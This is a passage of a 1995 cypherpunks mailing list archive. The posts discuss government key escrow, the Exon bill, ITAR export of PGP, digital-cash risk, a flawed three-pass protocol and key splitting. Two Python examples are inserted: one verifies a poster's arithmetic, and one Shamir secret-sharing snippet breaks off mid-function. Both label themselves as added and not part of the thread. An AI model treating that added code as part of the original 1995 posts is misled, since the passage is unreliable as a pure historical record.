places tomorrow morning (I'll probably be up all night): 

http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html
  [canon URL; multiple load-balancing SPARCServers]

http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html
  [use this if you have an old Sun DNS server that barfs on the 
   www-leland lbnamed tricks]

news.answers, comp.answers, comp.protocols.tcp-ip.ibmpc, and several
higher-traffic groups (this will be the first approved and rtfm-archived
posting; the news-answers folks got back to me last week). I'll probably
create the throwaway w95netbugs@aol.com for posting purposes. 

gopher://quixote.stanford.edu/1m/win95netbugs

An email autoresponder to be named later (finger this account in the 
morning).

An ezine or three to be named later.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMXlBY3DXUbM57SdAQFnzwP/ZaFJsyz7H/uViPAetTiaBnLxvgZBFmiE
mURZdUHU7vVPZ1cIjdO2j0ARoulwQvzXUywezTHusIBGgbxdMf0/NpErpAbFktvA
/A7uBGo38scSaYIATLpMEMx8aomoeDiwRxUyzXTCAaRnBHfHf0l0/egDUYPWnK3D
ZTF1cFzv+jA=
=cHCp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 6 Dec 95 07:49:04 PST
To: Peter Trei <trei@process.com>
Subject: re: NIST GAK export meeting, sv
In-Reply-To: <9512061445.AA14166@toad.com>
Message-ID: <Pine.SOL.3.91.951206104808.1606C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Dec 1995, Peter Trei wrote:

> "Hieronymous" says:
> >       (Thanks for the summary, Pat.)
> >       This last bit is really rich. I can't think of a single publically
> > defensible reason for the stipulation that every escrow agent must employ
> > someone with SECRET clearance, but I *can* think of a publically
> > indefensible reason for it -- to facilitate those spooky non-court wiretap
> > authorizations that've been alluded to in the fine print of the GAK
> > proposals.
> 
> This is probably one reason. Another is that they could shut down an
> escrow agent at a moment's notice by pulling the clearances. We
> haven't seen the other requirements, but an interesting question is
> what happens when an escrow agent goes out of business.


Firearms dealers are required to keep records of purchases.  In theory
(and by law) they don't pass these records along to the authorities 
except in response to specific inquiries.

However, in the last couple of years there have been numerous reports of 
mass copying of records by BATF or surrogates (specifics on request).

And when a firearms dealer goes out of business, all records go to the BATF.

So there is something of a precedent.

Brad

> 
> Speaking for myself....
> 
>  
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 09:33:21 PST
To: cypherpunks@toad.com
Subject: News on Congressional Debate on Exon
Message-ID: <aceb12f4150210045ba8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I just heard (12:15 EST) that the House has adopted language similar to the
original Exon-Coates language in the Senate (as opposed to the White
language, which was less restrictive in that it dealt with material that
was "harmful" to children, interpreted to mean child porn).

It looks like Internet Service Providers will soon be held liable for
"indecent material" passed by their systems. I would expect most ISPs will
drop the alt.binaries.* newsgroups as a first step, and maybe other groups
as well.

(Controlling Web page accesses is a much tougher problem, of course, so I
wouldn't expect much action on this at first.)

By the way, I recently discovered a new twist on "age credentials": the use
of credit cards to prove age. One image site is asking for a "valid credit
card number" to be given...not to use for charges, but just to do a quick
verification (they claim a few minutes or less) that the card is valid and
in the name of the person accessing their site.

Some obvious security issues. An interesting twist, though.

If the Exon Bill really does go into effect, and age limits on access are
imposed, I'll be looking for what we've always joked about: the
"Information Superhighway Driver's License."

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 6 Dec 95 11:44:11 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <wklMcgyMc50eEbskld@nsb.fv.com>
Message-ID: <Pine.SUN.3.91.951206104553.24528A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Nathaniel Borenstein wrote:

> I had assumed that there was a market discount, but it's still not quite
> that simple.  It's very hard for markets to deal with *unbounded* risk. 
> The biggest problem I see with most of the crypto-cash schemes is that
> there is a legitimate scenario -- however low-probability you might
> assess it to be -- of break-the-bank catastrophic failure, i.e. in which
> someone gains the keys that allow him to essentially print money.  This
> kind of low-probability, infinite-cost risk is the kind of thing that
> gives underwriters the heebie jeebies.  There's a good reason that most
> companies have "Ltd" after their name instead of "Unlimited", in those
> countries where that's the naming convention.

I find this argument totally unconvincing.  No risk is unbounded.  The 
worst thing that can possibly happen is that a nearby star goes supernova 
and completely destroys the earth.  Yet markets handle this 
low-probability risk quite well.

The direct cost of a break-the-bank catastrophic failure is bounded by the 
amount of capital the bank has.  This is because the market will not 
accept more liabilities (real or forged) from the bank than its capital.  
There may be other indirect costs resulting from dislocations, but these 
should also be proportional to the size of the bank.  Therefore your 
argument is really against centralization and for diversification and 
distribution.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robbie Gates <gates_r@maths.su.oz.au>
Date: Tue, 5 Dec 95 16:03:36 PST
To: solman@MIT.EDU
Subject: Re: Secure versus ?
In-Reply-To: <9512051652.AA17214@ua.MIT.EDU>
Message-ID: <30C4DED5.15FB@maths.su.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


solman@MIT.EDU wrote:
> Alice wants to use the inner loop to send bit b.
> 1. Alice randomly chooses seven bits of salt, and prepends b to them
>    creating an 8 bit M
> 2. Alice randomly chooses an (Na,Ea) pair from the list of possibilities.
> 3. Alice calculates D such that E*D mod (N-1) equals 1
> 4. Bob randomly chooses an (Nb,Eb) pair from the list of possibilities.
> 5. Bob calculates D
> 6. Alice sends Bob the nine bit number (M^Ea) mod Na = C1
> 7. Bob sends Alice (C1^Eb) mod Nb = C2
> 8. Alice sends Bob (C2^Da) mod Na = C3
> 9. Bob calculates (C3^Db) mod Nb = M, the bit being the MSB.

i don't think the maths works here ... let
Na = 257, Ea = 13, Da = 197, Nb = 263, 
Eb = 11, Db = 143

choosing M = 2, i calculate
C1 = 225, C2 = 144, C3 = 205, C4 = 33 != M
(and bottom bit is different)
choosing M = 7, i get
C1 = 127, C2 = 53, C3 = 19, C4 = 139 != M
(and top bit is different)

so your channel doesn't get the bit from alice to bob ...

the problem is that you are mixing reduction modulo two different numbers
Na and Nb ... this screws up the powering law you are trying to use.

 - robbie
-- 
----------------------------------------------------------------------
      robbie gates      | it's not a religion, it's just a technique.
  apprentice algebraist |    it's just a way of making you speak.
    pgp key available   |       - "destination", the church.
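The check Robbie Gates describes, as an added example that is not part of the thread: it reruns the quoted steps with his numbers, then repeats them with both parties sharing one prime modulus, where the exponents do commute. The shared-modulus variant is an assumption added here (the thread does not propose it), and the function names are hypothetical.

```python
# Added illustration; toy parameters are the ones quoted in the reply above.
# Requires Python 3.8+ for pow(e, -1, m).

def inverse_exponent(e, n):
    """Step 3 of the quoted protocol: D such that E*D mod (N-1) == 1 (N prime)."""
    return pow(e, -1, n - 1)


def three_pass(m, na, ea, da, nb, eb, db):
    """Run the exponentiations of steps 6-9 and return (C1, C2, C3, C4)."""
    c1 = pow(m, ea, na)    # step 6: Alice -> Bob, reduced mod Na
    c2 = pow(c1, eb, nb)   # step 7: Bob -> Alice, reduced mod Nb
    c3 = pow(c2, da, na)   # step 8: Alice -> Bob, reduced mod Na again
    c4 = pow(c3, db, nb)   # step 9: Bob's result, intended to equal m
    return c1, c2, c3, c4


def failing_messages(na, ea, nb, eb, messages):
    """Return every message for which Bob's final value differs from M."""
    da = inverse_exponent(ea, na)
    db = inverse_exponent(eb, nb)
    return [m for m in messages
            if three_pass(m, na, ea, da, nb, eb, db)[3] != m]


if __name__ == "__main__":
    # Mixed moduli, as in the quoted protocol: C2 lives in Z_263 but is then
    # reduced mod 257, so Ea*Da = 1 (mod 256) no longer cancels anything.
    print(three_pass(2, 257, 13, 197, 263, 11, 143))
    mixed = failing_messages(257, 13, 263, 11, range(256))
    print("mixed moduli:", len(mixed), "of 256 eight-bit messages fail")

    # Shared prime p = 257 (assumption added here): every value stays in one
    # group, so M^(Ea*Eb*Da*Db) = M because both E*D products are 1 mod p-1.
    shared = failing_messages(257, 13, 257, 11, range(256))
    print("shared modulus:", len(shared), "of 256 eight-bit messages fail")
```
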




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 6 Dec 95 08:13:47 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: The "Future" Fallacy
In-Reply-To: <acea8b9b110210048f27@[205.199.118.202]>
Message-ID: <199512061614.LAA12637@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan's comment was quite obvious. Any child old enough to use a
computer can already transmit coded messages that no government can
find easy to decipher. The "Future Fallacy" is the prediction of
things in the past.

Timothy C. May writes:
> >From: Duncan Frissell
> >Bill Gates (like Mister Newt before him) committed what I call the Future
> >Fallacy in "The Road Ahead."  Page 106.
> >
> >"Soon any child old enough to use a computer will be able to transmit coded
> >messages that no government on earth will find easy to decipher."
> >...................................................
> >
> >Billg is an optimist.
> >What's wrong with this picture, Duncan?
> 
> I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> Gates (I haven't read Gates' book).
> 
> I couldn't understand Duncan's koan, shrugged, and moved on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 11:17:56 PST
To: cypherpunks@toad.com
Subject: Re: ERA_sur
In-Reply-To: <199512061429.JAA08877@pipe4.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951206111709.4575K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, John Young wrote:

>    There's implicit boost for encryption in the controversial
>    "undeleting" of personal files on Jean Lewis's floppy,
>    subpoenaed by Whitewater investigators.
> 
>    Peter Wayner has a thread about it on Cyberia-L.

I'd say this is relevant, and a good article.

It was also in yesterday's San Jose Mercury News, which is available on
America "On Line" and other places. Might be on www.sjmercury.com.

[Where] is Cyberia-L archived?

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Wed, 6 Dec 95 11:25:11 PST
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512061926.LAA25326@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Sameer wrote:

        There was no Netscape (or RSADSI, for that matter [an RSADSI
employee showed up, but it was on his own time]) representative at the
recent Bernstein hearing in SF. I think that shows how much they
really care.

Actually, this is not entirely correct.  An attorney for a firm which is
outside counsel (crypto-related) to Netscape did attend the Bernstein
hearing.  

Lee Tien






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Wed, 6 Dec 95 11:25:22 PST
To: cypherpunks@toad.com
Subject: Re: Use of PGP as an export?
Message-ID: <199512061926.LAA25435@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually, the ITAR contains specific provisions for "defense services," and
it is possible to "export" "defense services."  

Lee Tien

From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 02 Dec 1995 19:24:24 -0800
Subject: Re: Use of PGP as an export?

At 09:09 PM 12/2/95 -0800, Ted Cabeen <cabeen@netcom.com> wrote:
>I think this has been brought up before, but I could only find one reference
>to it in the archives and it wasn't too helpful, so I'll ask again.  If a
>university provided a copy of PGP for use on their unix machines and a
>non-resident, non-citizen *used* the copy of PGP on the server, but did not
>download it onto their own machine, but instead just ran PGP on the server
>alone, would it be a violation of the ITAR?  My school is interested in
>putting a copy of PGP on the university server and wants to know if they
>should somehow restrict access to citizens and legal residents only.  Thanks.

That's not giving technical data to the foreigner, that's providing a service;
the ITAR doesn't seem to restrict that.  It's not an especially secure way to
operate, but that's an inherent problem with multi-user systems or file servers.
One way to implement it that would be only mildly insecure would be to put PGP
on a file server, with execute-only permissions; users of client machines
still could be attacked by somebody faking out NFS, but they wouldn't have
to send their passphrases across the net the way they would in a telnet session.
#--
#                               Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Lee Tien
Attorney
tien@well.sf.ca.us
(510) 525-0817 voice
(510) 525-3015 fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Wed, 6 Dec 95 11:30:36 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <aceb12f4150210045ba8@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951206112559.20969B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Timothy C. May wrote:

> 
> I just heard (12:15 EST) that the House has adopted language similar to the
> original Exon-Coates language in the Senate (as opposed to the White
> language, which was less restrictive in that it dealt with material that
> was "harmful" to children, interpreted to mean child porn).
> 
> It looks like Internet Service Providers will soon be held liable for
> "indecent material" passed by their systems. I would expect most ISPs will
> drop the alt.binaries.* newsgroups as a first step, and maybe other groups
> as well.

*Sigh*. Are we really ready to go back to UUCP? It looks like we'll have
to. That is, if someone doesn't set up a couple cryptographically enhanced
subnets first, or come up with some better idea. Interesting prospect,
actually. 

Anyone wish to comment on the prospect of a double blind server, set
outside U.S. borders, that can act as an interface to the rest of the
world, perhaps encrypting or stego'ing the data transferred between it and
the user? Basically, an anonymous remailer that acts as a cross between 
an NNTP, POP3, and SMTP servers.

> If the Exon Bill really does go into effect, and age limits on access are
> imposed, I'll be looking for what we've always joked about: the
> "Information Superhighway Driver's License."

God help us all.

--
Jason Burrell
South Texas Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 6 Dec 95 08:28:21 PST
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: Why Netscape employees should not leave
In-Reply-To: <199512040002.AA08103@ideath.goldenbear.com>
Message-ID: <199512061633.LAA29559@homeport.org>
MIME-Version: 1.0
Content-Type: text


	I think that this logic (below) is off.  GAK is evil.  Pure
and simple.  If the market wants CKE/optional escrow for business
that's one thing.  The recent NIST meeting has shown that any system
promulgated by the government will force on us a system with excessive
kowtowing to the 'interests of law enforcement.'

	If people want CKE, and I think they do, then the government
will get 90% of what it gets with GAK, with none of the fight.  Most
companies will happily turn over keys at the flash of a badge, never
mind a warrant.  (Was it Doug Barnes who pointed out that spying is
more exciting than banking?)  If it was easy, I'd probably have backup
escrowed copies of my secret keyring.  In Liechtenstein.

	This leaves us to ask, why GAK is such a big deal at NIST, if
CKE will get them most of what they want?  First, they haven't
realized that CKE is most of what they want.  Second, they're worried
about the extra 10%.  Drug dealers and terrorists not using it.  (This
points towards an eventual mandate for GAK, even if it starts out
voluntary.  Many have noted this.)  Third, they've invested so much
energy in the fight for GAK that they're emotionally tied to the idea,
and they can't say 'well this would be almost as good.'


Adam

| The last sentence seems backwards to me - mandatory GAK is the real evil, not
| non-mandatory GAK. (non-mandatory GAK is just a special case of voluntary
| key escrow, where some of us might choose to escrow to /dev/null, some to
| their attorney, some to a friend, and some to freeh@fbi.gov.) Non-mandatory
| GAK makes me nervous, because it seems susceptible to back-door coercion
| ("Dear Citizen: We notice that you've turned off GAK. Don't you trust us?
| Please write back and tell us why you're no longer letting us have access
| to your net traffic. Do you have something to hide?") but mandatory GAK
| is the worst-case scenario being implemented immediately.
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 10:22:52 PST
To: Ernest Hua <jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <aceb1fcf1602100460f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 PM 12/6/95, Ernest Hua wrote:

>The main point is that there is no such thing as the "letter of the law".
>What they enforce is much broader than that, and how they enforce it is much
>more subtle than clear-cut criminal prosecution.  Therefore, you cannot just
>use literal loop holes just because it's not clear, because the law they are
>enforcing is not clear either.
>
>This response should almost be an FAQ for this crowd.

Indeed. In fact, my Cyphernomicon FAQ contains numerous discussions about
ITAR and hooks. For example:

  - Dan Bernstein has argued that ITAR covers nearly all
              aspects of exporting crypto material, including codes,
              documentation, and even "knowledge." (Controversially, it
              may be in violation of ITAR for knowledgeable crypto people
              to even leave the country with the intention of developing
              crypto tools overseas.)

and

 10.10.6. "Can ITAR and other export laws be bypassed or skirted by
            doing development offshore and then _importing_ strong crypto
            into the U.S.?"
           - IBM is reportedly doing just this: developing strong crypto
              products for OS/2 at its overseas labs, thus skirting the
              export laws (which have weakened the keys to some of their
              network security products to the 40 bits that are allowed).
           + Some problems:
             - can't send docs and knowhow to offshore facilities (some
                obvious enforcement problems, but this is how the law
                reads)
             - may not even be able to transfer knowledgeable people to
                offshore facilities, if the chief intent is to then have
                them develop crypto products offshore (some deep
                Constitutional issues, I would think...some shades of how
                the U.S.S.R. justified denying departure visas for
                "needed" workers)
           - As with so many cases involving crypto, there are no
              defining legal cases that I am aware of.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 6 Dec 95 08:46:39 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: No More Netscape Comments from Me
In-Reply-To: <v02120d10aceb5449cdea@[199.0.65.105]>
Message-ID: <199512061647.LAA12675@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
> >So, have fun riding the Great Internet Bubble of 1995!
> 
> Yeah... I wonder what the price of Netscape puts around, say, March are
> these days...

No conventional options are available on Netscape yet. The price on
custom options is high, and you have to trade a very large (quarter to
half million dollar) sum in order to get them.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 6 Dec 95 08:57:33 PST
To: cypherpunks%toad.com@genie_1
Subject: GAK
In-Reply-To: <6615943A02502C79@-SMF->
Message-ID: <6615943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


I heard a while back about being able to "split" up a PGP key.  What about
splitting up the key into many parts, and giving them out to multiple
INDEPENDENT agencies.  ie: One piece goes to the FBI, one to the NSA, one to
some other committee, and so on.  That way, no government body could just tap
your conversations without getting approval from others, and gaining the
pieces of your key.

just a thought




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 11:56:32 PST
To: cypherpunks@toad.com
Subject: Note on "Barring Netscape"
Message-ID: <199512061957.LAA05418@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22 (compatible"
to the server, which triggers an incorrect response from, e.g., www.c2.org.
This little fraud has the potential to make you look silly if left unexplained.

If you get the string "compatible;" (or Compatible;?), you should instead pop
up Netscapisms that show that Microsoft is lying. Or maybe Billisms.
<font face="Symbol">, which affects only MSIE, might be appropriate.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 6 Dec 95 09:02:06 PST
To: cypherpunks@toad.com
Subject: re: Secret Clearance
Message-ID: <v02130506aceb035d409b@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:00 12/5/95, Pete Loshin wrote:

>>From working at an organization that did a lot of government work,
>my understanding of the process of clearing employees is this:
>
>-certain tasks require knowledge or access that must be restricted
>-you have to have a high degree of trust in the people doing those tasks
>-people with money troubles, out-of-control addictions, skeletons in the
> closet, and histories of "troubles" are prime targets for subversion
>-doing a clearance check (in theory) eliminates the possibility that
> these people will be blackmailed/bribed into revealing their secrets

The problem is that they are subject to blackmail/bribery/subversion ONLY
because the employer will use the info as an excuse for firing/restricting
the employee. If someone has a "skeleton in the closet" such as being gay,
so long as the employer does not discriminate against gays who INFORM the
employer of their sexual orientation or if the employer does not care about
the person being gay (ie: removes it as a potential blackmail threat) there is
no problem so far as I can see. It is only when there is something that is
WORK RELATED which would affect the person's performance if not known that
the question of a background check is relevant.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 6 Dec 95 10:28:35 PST
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: re: Secret Clearance
In-Reply-To: <v02130506aceb035d409b@[166.84.254.3]>
Message-ID: <Pine.SUN.3.91.951206122514.21618A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Robert A. Rosenberg wrote:

> The problem is that they are subject to blackmail/bribery/subversion ONLY
> because the employer will use the info as an excuse for firing/restricting
> the employee. If someone has a "skeleton in the closet" such as being gay,
> so long as the employer does not discriminate against gays who INFORM the
> employer of their sexual orientation or if the employer does not care about
> the person being gay (ie: removes it as a potential blackmail threat) there is
> no problem so far as I can see. It is only when there is something that is
> WORK RELATED which would affect the person's performance if not known that
> the question of a background check is relevant.

	That's not completely true. He may not care that his employer knows
that he is gay, but he would not anything for say his old mother and father
not to know. You can never be sure about what people *really* care about.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 11:08:46 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <aceb2a8d1b021004e6f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:21 PM 12/6/95, jim bell wrote:

>NO!  You didn't read my commentary carefully enough.   These "hooks" (your
>words) will, in effect, already be connected to encryption software weak
>enough to make NSA happy.  You know, 40 bit keys or something like that.
>But instead of being in one large file, embedded into a program, it'll be
>TWO files.  Simple programming change.  Everything that
>implements/defines/limits the encryption to 40 bits will be in the smaller
>file.
>This really isn't a "hook," it's an internal connection between two
>portions of the same program. (actually, it wouldn't need to be in two
>separate files; a file which implements a patch for the first file would
>work great.)
>
>It'll be exportable, because its key size is "acceptable."  At the time
>the export license is requested, the replacement module to increase key
>size probably won't even  exist, in order to avoid giving the USG an
>excuse to deny the export license.   After the license is obtained, the
>replacement module is written and shipped to domestic users.
>
>I fully realize the USG won't "like" this kind of thing.  But if they are
>trying to take the position that certain kinds of encryption software CAN
>be exported, and some can't, they're going to have to approve SOME
>programs for export, using criteria which at least pretend to be
>objective.

Yes, I read your proposal. The "hooks" term is not my coinage, but refers
to this general idea. I urge you to read what others, including companies,
have had to say on this matter. Much of the debate on "interoperability"
revolves around details of entry points to crypto modules and such hooks.

No point in arguing with Jim on this anymore, so I won't.

Good luck, Jim, in introducing such a product.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 10:07:47 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: PGP
Message-ID: <Pine.SOL.3.91.951206125002.25551A-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



   I've tried to find out the answers to my
questions myself but I haven't been very successful.
Actually, I haven't been successful at all.  First of all,
I've been using PGP on my computer but when I tried to port it
over to my unix account it didn't work.  I took the source code
and tried to compile it using the unix g++ compiler but it gave
me all of these errors.  Where can I find PGP that is already
compiled for unix or at the very least will compile for unix?
Secondly, if I create a program that makes using PGP more
user friendly can I let other people have it ( for FREE )?
Lastly, what is considered overkill with cryptography?
I don't believe anything is.  My programs accept what the user
inputs for how large prime numbers should be ( my public
key programs ) but I make them able to accept values that go
up to 30720 bits ( I don't believe a number can ever be large
enough ).  You can never be too safe...never.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 6 Dec 95 11:03:26 PST
To: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Subject: Re: PGP
Message-ID: <199512061921.NAA00167@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:54 PM 12/6/95 -0500, you wrote:

>   I've tried to find out the answers to my
>questions myself but I haven't been very successful.
>Actually, I haven't been successful at all.  First of all,
>I've been using PGP on my computer but when I tried to port it
>over to my unix account it didn't work.  I took the source code
>and tried to compile it using the unix g++ compiler but it gave
>me all of these errors.  Where can I find PGP that is already
>compiled for unix or at the very least will compile for unix?
>Secondly, if I create a program that makes using PGP more
>user friendly can I let other people have it ( for FREE )?
>Lastly, what is considered overkill with cryptography?
>I don't believe anything is.  My programs accept what the user
>inputs for how large prime numbers should be ( my public
>key programs ) but I make them able to accept values that go
>up to 30720 bits ( I don't believe a number can ever be large
>enough ).  You can never be too safe...never.

Firstly - and don't take this personally - how much computer
knowledge do you have?  The PGP sources use all sorts of
#ifdefs and other kludges.  A fair amount of C coding
ability is needed to get the damn things to do much of
anything.  (Hell, I can't read most of it - my precompiled
MSDOS version does what I need it to do.)

If you make PGP more user friendly... well, PGP 3.0 is still
coming Real Soon Now (TM) and it will include an API that
will make hooking into it ridiculously simple.  Beyond that,
there are already a number of good DOS and Windows shells
for it, and nobody on unix-flavoured systems expects a clean
user interface anyway :)  (Well, except for XWindows...)
But, if you write it - and I'm cautioning you to be sure
you don't reinvent the wheel - you can distribute it freely.
I suggest using the terms of the GNU GPL.

And the key values - well, you can give it 32k bits, but 1.
generating a key pair could take a prohibitively long time;
2. nobody else can use it (the default PGP distributions
are capped off at 2047 bits).

Good luck.
Dave
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(573)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 6 Dec 95 11:03:24 PST
To: SBinkley@atitech.ca (Scott Binkley)
Subject: Re: GAK
Message-ID: <199512061921.NAA00175@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:56 AM 12/6/95 EST, SBinkley@atitech.ca wrote:

>I heard a while back about being able to "split" up a PGP key.
I suppose you could, with some variant of Shamir's secret-
sharing scheme.  I'm not familiar with any specific
applications that do this.  (But that's irrelevant.)

>What about splitting up the key into many parts, and giving
>them out to multiple INDEPENDENT agencies.  ie: One piece
>goes to the FBI, one to the NSA, one to some other committee,
>and so on.  That way, no government body could just tap your
>conversations without getting approval from others, and
>gaining the pieces of your key.
That still doesn't address the basic issue - that the government
has NO RIGHT to access our _private_ keys.  If you want to
assume a fairly paranoid threat model, each of these different
agencies will instantly combine their parts to generate the
whole key.  If you trust the government, it might work.
Personally, I trust the government about as far as I can
throw the typical Man In Black.

Dave
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(573)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/
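The key splitting discussed in this exchange, as an added example that is not part of either post: a k-of-n Shamir secret sharing over a prime field, showing that all holders pooling their pieces recovers the key (the reply's concern) while fewer than k pieces are consistent with every possible key. The field size, the sample key and all function names are assumptions made here; this is not a PGP feature.

```python
# Added illustration of Shamir secret sharing; names and sizes are hypothetical.
# Requires Python 3.8+ for pow(x, -1, p).
import secrets

PRIME = 2**127 - 1  # Mersenne prime; secrets must be smaller than this


def split(secret, k, n, prime=PRIME):
    """Split `secret` into n shares, any k of which reconstruct it."""
    if not (1 <= k <= n < prime and 0 <= secret < prime):
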